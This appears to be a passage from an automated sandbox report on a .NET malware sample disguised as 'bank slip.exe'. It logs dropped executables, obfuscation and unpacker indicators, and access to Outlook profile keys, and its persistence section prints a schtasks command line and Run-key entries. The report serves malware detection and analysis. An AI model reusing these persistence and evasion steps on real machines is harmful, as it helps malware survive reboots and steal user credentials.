                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\bank slip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\bank slip.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: bank slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: bank slip.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: bank slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: NjBW.pdb source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr
                        Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 0000000F.00000000.2169045059.0000000000EC2000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr
                        Source: Binary string: NjBW.pdbSHA256 source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr
                        Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 0000000F.00000000.2169045059.0000000000EC2000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: 0.2.bank slip.exe.260f66c.1.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                        Source: 0.2.bank slip.exe.6750000.10.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                        .NET source code contains potential unpacker
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs.Net Code: bUZDm6yIUj System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.bank slip.exe.5140000.8.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs.Net Code: bUZDm6yIUj System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.bank slip.exe.35c9970.4.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0639A365 push 8B0405CCh; iretd 9_2_0639A36A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD7D37 pushad ; retf 14_2_05CD7D41
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD6468 push eax; retf 14_2_05CD646E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD1778 push es; retf 14_2_05CD177A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD66A0 push esp; retf 14_2_05CD66A6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD30F1 push ds; retf 14_2_05CD30F2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD2838 push ss; retf 14_2_05CD2842
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD2298 push cs; retf 14_2_05CD22A2
                        Source: bank slip.exeStatic PE information: section name: .text entropy: 7.962545979931204
                        Source: mKSjGvfmIulVB.exe.0.drStatic PE information: section name: .text entropy: 7.962545979931204
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, HxsbFDEGN9yUQ06UPl.csHigh entropy of concatenated method names: 'Gs3vPaIkSA', 'IJsvsucB6B', 'sLevwPL59E', 'Qs5vHgSk4H', 'N5Qvq12YFH', 'vuQv8WOgXG', 'ecNv6ZBQl3', 'E54vWCcZYi', 'lNCvUqeyXf', 'g2RvfMJF8J'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, KDgZwpWiswQerbEGq0d.csHigh entropy of concatenated method names: 'qBDX8eiikioJA', 'UGCQwwCCfLZM3I1ggHM', 'SGOYgFCPK9EHS6B8L8W', 'dUWmDYCXUSL7yAo0bsp', 'BR2flPCm2JHJQ9EXNYO', 'YxSpPhCcTlucnEUgaBC'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RPBv9eW6P3fcSVhK7Q6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nPv7OFCsXB', 'Mu97nTjuua', 'z1l7tpu6DC', 'vOx7B8pPPP', 'IB37y1uRxB', 'B8U7lqkR16', 'qgI7i2dV5v'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, h0ksr6wL5baDLWDeKh.csHigh entropy of concatenated method names: 'p9CXR6CL4I', 'af7XGTu5i1', 'tQar1Xlwxg', 'vY3rYuyqIP', 'IubXfLgSOa', 'stxXLgMs6T', 'qpkXu4RQIw', 'JpDXONZh4f', 'LvnXnpgEBJ', 'OpFXtHpTtq'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, LuAmB1CIIBw0IIen84.csHigh entropy of concatenated method names: 'uUAm34lTZ', 'J4xV4tVZt', 'sSZhNLRPU', 'W1jK3VSLN', 'OWMssnrw4', 'gEpIOrSt2', 'w3DfiEdqesAAVIUP75', 'hIxk1u9ltAxoTB6UJK', 'UU5ronB8n', 'wQy7Z3QBc'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, DhkeECurkuM2ajfWWK.csHigh entropy of concatenated method names: 'uDGr5yCfeX', 'wvWr0dnCB8', 'ymOrZ23Pt6', 'DOUrA7q92l', 'jh6rbEhjb8', 'hIMraGEVxT', 'Mf0rJh45n0', 'ygsreVyp0T', 'jgerkO4JJt', 'smxrjodxxm'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, sfsXZwXfvR3dieCKhH.csHigh entropy of concatenated method names: 'YiU0OufSNm', 'z9i0n4ipEG', 'Lm00tsR1eX', 'hDJ0BkH2R2', 'aUh0ybjvXx', 'mp80lp9Xlo', 'sHS0i91quN', 'zTJ0R5eWM2', 'MFA0cu1dV7', 'smI0GoLdSm'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, J4A3nvmZhShG1GYEQC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YmCNcMnCeq', 'NtqNGlSwO9', 'KAjNzYD1ME', 'MUyg1ly9Gs', 'BCkgYYXAFy', 'kw5gN7K2t4', 'EenggbBxnZ', 'Jj4kEBgc4dr9geLRrGo'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYNQdoLFBlDdX1Oj8U.csHigh entropy of concatenated method names: 'NXAgpSUtEN', 'K9Cg5riOUp', 'TIbg0eJT1e', 'k7MgZnEZJk', 'eJxgAvWARR', 'bU7gbXc9Ny', 'dFVgaa9mFK', 'XrAgJ5bSYx', 'JpFget3PxG', 'eKJgkR2f2Y'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, wWkMA98MASUoIsFn4D.csHigh entropy of concatenated method names: 'ToString', 'H8e9fTReSf', 'Vjw9HMOSPX', 'aDF9daCfIn', 'oYL9qjQ1RB', 'apo98terv2', 'bYK92qkZ1t', 'EtX96er81k', 'QLW9W5FFeX', 'evq9T7siJM'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, rdZNDk11na0gtIvC30.csHigh entropy of concatenated method names: 'XhBMYqWebf', 'V0eMgcuxni', 'EG7MDlR3Kx', 'TpnM5J3fFy', 'JJOM0yjYnH', 'dMIMATgFr8', 'qHFMbJ0gfv', 'uaOriemfoK', 'I30rRX29EZ', 'hKxrcH4pNx'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, UfiEhAqDBRkf2XDQp0.csHigh entropy of concatenated method names: 'Tk1SUP3Fqb', 'jx4SLLsFla', 'KMiSO7UFh7', 'MCiSnUDoKA', 'xDlSHbs4Gw', 'z6iSdYeAcc', 'iUySqKngX3', 'UaBS8RTyL8', 'GmqS23bauH', 'UM6S6L7QVK'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, W5NXKHMEm5Ij918IP7.csHigh entropy of concatenated method names: 'QgvXk4pUVt', 'l4gXjsLqkl', 'ToString', 'Ar1X5tacoG', 'pVaX0eqs9V', 'FapXZURIcs', 'jTDXAmywlC', 'srlXb6R35Y', 'EVWXamgb3o', 'Tv1XJn0ll6'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, Ep5nCIitlJU5ZYBXvp.csHigh entropy of concatenated method names: 'CXLYaqNn54', 'zCbYJ9oL65', 'SRYYk8HhEw', 'DwDYjeBskG', 'X25YScAJ1X', 'pcjY96OfvN', 'wIrtDp71pY7vyKBqMM', 'cSZ2liZPgDqxvZa89G', 'tAgYYldZAp', 'L04YgIgdft'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, R7bVXuZ7MHjwb6DtgD.csHigh entropy of concatenated method names: 'eukA4bblGb', 'zykAKrCvBd', 'lu0ZdRHtDw', 'uX1ZqZu6wG', 'PhgZ8CiWne', 'KiYZ2XJygS', 'klCZ6uWFWq', 'LluZWZVy6l', 'SOdZTFu2pj', 'P34ZUDQk8m'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, A6VJMMhuqgN8emaiMN.csHigh entropy of concatenated method names: 'SeWrw4Qgns', 'FFNrH1r4c8', 'wnUrdA6X2X', 'cbBrqtpYPA', 'QZbrO4EvhQ', 'JmQr8m3Abt', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, AQKpSGeTUbq29D6fK9.csHigh entropy of concatenated method names: 'sbtbpix1bH', 'nqgb0CoXp0', 'Pu6bAv6J25', 'BfKbaKWa5h', 'k9JbJ2MGvV', 'tkZAyYL42j', 'AYYAlvdiLG', 'PEZAirePfZ', 'LAAAR0XvfB', 'OW5AcMu1R8'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, jmNIBcrHrW0ELPZGY6.csHigh entropy of concatenated method names: 'Er4a5a19cy', 'W8gaZ1reJu', 'qZmab8RrCN', 'eXvbGARaVF', 'bpAbzkKBy3', 'AkWa1C0Q1s', 'EDHaYvUyt3', 'kMoaNPMZf1', 'lw5agQw1EV', 'dIbaDoJbUB'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, fqCqGBPw45OflmtbiV.csHigh entropy of concatenated method names: 'Dispose', 'Du1YcRnvKw', 'a8yNHNyfl3', 'dniooc7Fr2', 'XUXYGAfjdg', 'tgIYz0PaV2', 'ProcessDialogKey', 'IsZN1pZd1V', 'UuqNYWPHYp', 'yFcNN4atNj'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, x0DyjfzCgiXqO6cHLY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y7UMvd8gfk', 'DVKMSHddrK', 'kPmM9ST8L7', 'SnbMXPSUBM', 'OI1MrFyxmg', 'CeCMMJ4HLF', 'qEMM7kxEmA'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, pssgAdWQVCHOX6LkNrQ.csHigh entropy of concatenated method names: 'xKMMQHqDTo', 'HhPME4AqoJ', 'jTHMmH5CZn', 'GRQMVL2mxa', 'y5eM4D0bLA', 'C6pMhMOOuS', 'nSDMKaYI0c', 'l2wMPJKRub', 'xHCMsL6Ylk', 'D3eMIHfpiI'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYQ0TUYmVRwcWgAP8g.csHigh entropy of concatenated method names: 'nATZVtn5AL', 'PuYZhxnT3k', 'jDtZPfuAGR', 'snQZsK738G', 'iiCZSCNs9d', 'v8IZ9Cv5or', 'jncZXPlJTJ', 'ecbZrciJdh', 'masZM3AWsT', 'RQFZ7vmB5n'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, CdNb8MHDbjsBQ7T66m.csHigh entropy of concatenated method names: 'sghaQllE8V', 'dBpaER9nBx', 'aukamyehLL', 'F3raVC8iUJ', 'nS9a4P3gn5', 'fjwahJ5dle', 'TVdaKIsuI4', 'E1paPKp3Vl', 'PJYaslH4xW', 'lUxaIVusgu'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, kLyHujWW6FSxHLWh9NF.csHigh entropy of concatenated method names: 'ToString', 'xVA7gb6X1l', 'iuV7DAFhmG', 'P6y7pa5xqy', 'yIN75ApCuc', 'C0v70iAb1P', 'GZ97ZfgM7F', 'NJh7At9q6y', 'DKoeVtmHlj4w1TIEG7Q', 'iIpZ9XmqLF1fgNQto3a'
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, E93JP.csHigh entropy of concatenated method names: 'O3GewIY79r', 'ozlix3jYlSi', 'rTdmwtTHv1N', 'jqRy6h0g1cX', 'JG6N0SP', 'x9Oe05WPWUp', 'JhSgt5x', 'H9d', 'OBrYDtnZ2J', 'ZQHYbk'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, HxsbFDEGN9yUQ06UPl.csHigh entropy of concatenated method names: 'Gs3vPaIkSA', 'IJsvsucB6B', 'sLevwPL59E', 'Qs5vHgSk4H', 'N5Qvq12YFH', 'vuQv8WOgXG', 'ecNv6ZBQl3', 'E54vWCcZYi', 'lNCvUqeyXf', 'g2RvfMJF8J'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, KDgZwpWiswQerbEGq0d.csHigh entropy of concatenated method names: 'qBDX8eiikioJA', 'UGCQwwCCfLZM3I1ggHM', 'SGOYgFCPK9EHS6B8L8W', 'dUWmDYCXUSL7yAo0bsp', 'BR2flPCm2JHJQ9EXNYO', 'YxSpPhCcTlucnEUgaBC'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RPBv9eW6P3fcSVhK7Q6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nPv7OFCsXB', 'Mu97nTjuua', 'z1l7tpu6DC', 'vOx7B8pPPP', 'IB37y1uRxB', 'B8U7lqkR16', 'qgI7i2dV5v'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, h0ksr6wL5baDLWDeKh.csHigh entropy of concatenated method names: 'p9CXR6CL4I', 'af7XGTu5i1', 'tQar1Xlwxg', 'vY3rYuyqIP', 'IubXfLgSOa', 'stxXLgMs6T', 'qpkXu4RQIw', 'JpDXONZh4f', 'LvnXnpgEBJ', 'OpFXtHpTtq'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, LuAmB1CIIBw0IIen84.csHigh entropy of concatenated method names: 'uUAm34lTZ', 'J4xV4tVZt', 'sSZhNLRPU', 'W1jK3VSLN', 'OWMssnrw4', 'gEpIOrSt2', 'w3DfiEdqesAAVIUP75', 'hIxk1u9ltAxoTB6UJK', 'UU5ronB8n', 'wQy7Z3QBc'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, DhkeECurkuM2ajfWWK.csHigh entropy of concatenated method names: 'uDGr5yCfeX', 'wvWr0dnCB8', 'ymOrZ23Pt6', 'DOUrA7q92l', 'jh6rbEhjb8', 'hIMraGEVxT', 'Mf0rJh45n0', 'ygsreVyp0T', 'jgerkO4JJt', 'smxrjodxxm'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, sfsXZwXfvR3dieCKhH.csHigh entropy of concatenated method names: 'YiU0OufSNm', 'z9i0n4ipEG', 'Lm00tsR1eX', 'hDJ0BkH2R2', 'aUh0ybjvXx', 'mp80lp9Xlo', 'sHS0i91quN', 'zTJ0R5eWM2', 'MFA0cu1dV7', 'smI0GoLdSm'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, J4A3nvmZhShG1GYEQC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YmCNcMnCeq', 'NtqNGlSwO9', 'KAjNzYD1ME', 'MUyg1ly9Gs', 'BCkgYYXAFy', 'kw5gN7K2t4', 'EenggbBxnZ', 'Jj4kEBgc4dr9geLRrGo'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYNQdoLFBlDdX1Oj8U.csHigh entropy of concatenated method names: 'NXAgpSUtEN', 'K9Cg5riOUp', 'TIbg0eJT1e', 'k7MgZnEZJk', 'eJxgAvWARR', 'bU7gbXc9Ny', 'dFVgaa9mFK', 'XrAgJ5bSYx', 'JpFget3PxG', 'eKJgkR2f2Y'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, wWkMA98MASUoIsFn4D.csHigh entropy of concatenated method names: 'ToString', 'H8e9fTReSf', 'Vjw9HMOSPX', 'aDF9daCfIn', 'oYL9qjQ1RB', 'apo98terv2', 'bYK92qkZ1t', 'EtX96er81k', 'QLW9W5FFeX', 'evq9T7siJM'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, rdZNDk11na0gtIvC30.csHigh entropy of concatenated method names: 'XhBMYqWebf', 'V0eMgcuxni', 'EG7MDlR3Kx', 'TpnM5J3fFy', 'JJOM0yjYnH', 'dMIMATgFr8', 'qHFMbJ0gfv', 'uaOriemfoK', 'I30rRX29EZ', 'hKxrcH4pNx'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, UfiEhAqDBRkf2XDQp0.csHigh entropy of concatenated method names: 'Tk1SUP3Fqb', 'jx4SLLsFla', 'KMiSO7UFh7', 'MCiSnUDoKA', 'xDlSHbs4Gw', 'z6iSdYeAcc', 'iUySqKngX3', 'UaBS8RTyL8', 'GmqS23bauH', 'UM6S6L7QVK'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, W5NXKHMEm5Ij918IP7.csHigh entropy of concatenated method names: 'QgvXk4pUVt', 'l4gXjsLqkl', 'ToString', 'Ar1X5tacoG', 'pVaX0eqs9V', 'FapXZURIcs', 'jTDXAmywlC', 'srlXb6R35Y', 'EVWXamgb3o', 'Tv1XJn0ll6'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, Ep5nCIitlJU5ZYBXvp.csHigh entropy of concatenated method names: 'CXLYaqNn54', 'zCbYJ9oL65', 'SRYYk8HhEw', 'DwDYjeBskG', 'X25YScAJ1X', 'pcjY96OfvN', 'wIrtDp71pY7vyKBqMM', 'cSZ2liZPgDqxvZa89G', 'tAgYYldZAp', 'L04YgIgdft'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, R7bVXuZ7MHjwb6DtgD.csHigh entropy of concatenated method names: 'eukA4bblGb', 'zykAKrCvBd', 'lu0ZdRHtDw', 'uX1ZqZu6wG', 'PhgZ8CiWne', 'KiYZ2XJygS', 'klCZ6uWFWq', 'LluZWZVy6l', 'SOdZTFu2pj', 'P34ZUDQk8m'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, A6VJMMhuqgN8emaiMN.csHigh entropy of concatenated method names: 'SeWrw4Qgns', 'FFNrH1r4c8', 'wnUrdA6X2X', 'cbBrqtpYPA', 'QZbrO4EvhQ', 'JmQr8m3Abt', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, AQKpSGeTUbq29D6fK9.csHigh entropy of concatenated method names: 'sbtbpix1bH', 'nqgb0CoXp0', 'Pu6bAv6J25', 'BfKbaKWa5h', 'k9JbJ2MGvV', 'tkZAyYL42j', 'AYYAlvdiLG', 'PEZAirePfZ', 'LAAAR0XvfB', 'OW5AcMu1R8'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, jmNIBcrHrW0ELPZGY6.csHigh entropy of concatenated method names: 'Er4a5a19cy', 'W8gaZ1reJu', 'qZmab8RrCN', 'eXvbGARaVF', 'bpAbzkKBy3', 'AkWa1C0Q1s', 'EDHaYvUyt3', 'kMoaNPMZf1', 'lw5agQw1EV', 'dIbaDoJbUB'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, fqCqGBPw45OflmtbiV.csHigh entropy of concatenated method names: 'Dispose', 'Du1YcRnvKw', 'a8yNHNyfl3', 'dniooc7Fr2', 'XUXYGAfjdg', 'tgIYz0PaV2', 'ProcessDialogKey', 'IsZN1pZd1V', 'UuqNYWPHYp', 'yFcNN4atNj'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, x0DyjfzCgiXqO6cHLY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y7UMvd8gfk', 'DVKMSHddrK', 'kPmM9ST8L7', 'SnbMXPSUBM', 'OI1MrFyxmg', 'CeCMMJ4HLF', 'qEMM7kxEmA'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, pssgAdWQVCHOX6LkNrQ.csHigh entropy of concatenated method names: 'xKMMQHqDTo', 'HhPME4AqoJ', 'jTHMmH5CZn', 'GRQMVL2mxa', 'y5eM4D0bLA', 'C6pMhMOOuS', 'nSDMKaYI0c', 'l2wMPJKRub', 'xHCMsL6Ylk', 'D3eMIHfpiI'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYQ0TUYmVRwcWgAP8g.csHigh entropy of concatenated method names: 'nATZVtn5AL', 'PuYZhxnT3k', 'jDtZPfuAGR', 'snQZsK738G', 'iiCZSCNs9d', 'v8IZ9Cv5or', 'jncZXPlJTJ', 'ecbZrciJdh', 'masZM3AWsT', 'RQFZ7vmB5n'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, CdNb8MHDbjsBQ7T66m.csHigh entropy of concatenated method names: 'sghaQllE8V', 'dBpaER9nBx', 'aukamyehLL', 'F3raVC8iUJ', 'nS9a4P3gn5', 'fjwahJ5dle', 'TVdaKIsuI4', 'E1paPKp3Vl', 'PJYaslH4xW', 'lUxaIVusgu'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, kLyHujWW6FSxHLWh9NF.csHigh entropy of concatenated method names: 'ToString', 'xVA7gb6X1l', 'iuV7DAFhmG', 'P6y7pa5xqy', 'yIN75ApCuc', 'C0v70iAb1P', 'GZ97ZfgM7F', 'NJh7At9q6y', 'DKoeVtmHlj4w1TIEG7Q', 'iIpZ9XmqLF1fgNQto3a'
                        Source: 0.2.bank slip.exe.260f66c.1.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                        Source: 0.2.bank slip.exe.6750000.10.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                        Source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, E93JP.csHigh entropy of concatenated method names: 'O3GewIY79r', 'ozlix3jYlSi', 'rTdmwtTHv1N', 'jqRy6h0g1cX', 'JG6N0SP', 'x9Oe05WPWUp', 'JhSgt5x', 'H9d', 'OBrYDtnZ2J', 'ZQHYbk'
                        Source: C:\Users\user\Desktop\bank slip.exeFile created: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeJump to dropped file

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Hides that the sample has been downloaded from the Internet (zone.identifier)
